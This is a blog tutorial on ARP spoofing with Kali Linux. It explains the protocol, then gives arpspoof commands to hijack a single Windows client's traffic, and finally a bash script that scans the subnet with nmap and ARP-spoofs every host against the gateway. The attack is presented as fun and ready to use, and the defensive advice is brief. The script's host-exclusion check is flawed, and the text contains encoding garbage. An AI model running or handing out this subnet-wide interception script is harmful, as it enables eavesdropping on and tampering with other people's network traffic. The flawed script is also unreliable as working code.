Good day ordinary and extraordinary security people. let’s take a look at “ARP spoofing” today and make it even more interesting by creating a script that redirects the entire subnet to you. As in the “MitM Proxy on Kali” blog, we will use our Kali 2023.1 again, since everything we need is already installed. So boot up the VM and get ready, let’s get started!
But first, a quick digression about ARP and what ARP spoofing actually is. If you already know this, you can skip it. ARP stands for “Address Resolution Protocol” and is a network protocol that allows MAC addresses to be converted to IP addresses. Similar to looking up the physical address of a letter, ARP looks up the MAC address of a device when only the IP address is known, and vice versa. Each device has a unique MAC address, while IP addresses are used in the Internet Protocol to identify devices. When a device wants to send data to an IP address, it looks in its ARP table for the corresponding MAC address. If this address is not available, it sends an ARP request to the network to determine the MAC address. The response is then entered into the ARP table to enable future communication. In this way, ARP facilitates communication between devices on a network.
ARP spoofing is a technique in which an attacker exploits the Address Resolution Protocol (ARP) to spread false MAC address information and redirect traffic on a network. By sending forged ARP messages, the attacker poses as another device and tricks other devices on the network into using the attacker’s MAC address instead of the intended destination. This allows the attacker to eavesdrop on all traffic, intercept or even manipulate sensitive information. ARP spoofing can also be used for denial of service attacks, where the attacker floods the network with fake ARP messages, causing congestion. To protect against ARP spoofing, network monitoring and intrusion detection systems can be implemented, or static ARP tables can be used. These can help detect suspicious traffic or protect against tampering. It is important to be aware of the dangers of ARP spoofing and to take appropriate protective measures to ensure the security and integrity of the network. However, it is important to note that this is a local attack.
Ok now that we know all this, we can use the tool “arpspoof” in kali to exploit this quite easily. We want to make a client communicate with us first instead of directly with its gateway (in our case with the firewall) and vice versa. This means that all connections from the client to the firewall and from the firewall to the client should go through our attacker machine.
Single target
To warm up our knowledge a bit, we’ll just hijack the traffic of a single machine with the tool. First, we need to know the IP addresses of the target systems. In our case, the client “172.16.1.140” and the firewall “172.16.1.1“, that’s all. Our attacker machine in this example has the IP address “172.16.1.139” and the MAC address ends with “0A-14-31“. First, let’s look at the ARP table on the Windows system we want to attack with the “arp -a” command.
We can see that our default gateway has a MAC address ending in “0a-14-12“. With the following command in Kali, we now attack the Windows system and trick it into thinking that we now have the IP address “172.16.1.1“.
sysctl -w net.ipv4.ip_forward=1
arpspoof -i eth0 -t 172.16.1.140 -r 172.16.1.1You can immediately see that the MAC address in the ARP table for the firewall has changed. Attack complete, all traffic is now flowing through our machine π
Cool stuff, but what can you do with it? For example, you can use the tool “dnsspoof” to redirect all or only desired DNS lookups to another IP. Or you can use WireShark to record the traffic (not so interesting in times of https) or you can use “Driftnet” to sniff images. A million ways to attack.
Subnet redirection
Our real goal, as announced, is to have all clients on the network run through us. Be warned, this is like launching a fighter jet on the network, it’s pretty loud. Anyway, it’s fun, so let’s write the script. First, with “nmap” we search all hosts in the network and then redirect them to us with “arpspoof“. The target is always the firewall, because we want to capture the outgoing traffic. Let’s go.
#!/bin/bash
rm "./nmaphosts.txt"
# find hosts on subnet
ip=$(ifconfig eth0 | grep -w inet | cut -d" " -f10)
gw=$(ip r | grep default | awk '{print $3}')
ip_range=$(echo $ip | cut -d"." -f1-3).0/24
nmap $ip_range -sn -oG "./nmaphosts.txt" >/dev/null
# arp spoofing
cmd="none"
for line in $(cat ./nmaphosts.txt)
do
if [[ $line =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
if [[ ! $line == $ip ]] || [[ ! $line == $gw ]]; then
arpspoof -i eth0 -t $line -r $gw &
fi
fi
doneTo exit the script, just type exit on the console. Here is a dirty and fast code, of course it can be embellished with grep etc., but I leave that to you π
What can you do to protect yourself against such attacks, unfortunately not much. On the one hand, you could sensitize the network monitoring, because as mentioned at the network level, it is extremely noisy. On the other hand, you could use static ARP tables. This is not an option for clients, but maybe for a crown jewel server? I have never done that.
Thatβs it so far, stay tuned and see you soon!
** midjourney string βmalware attack explosionβ
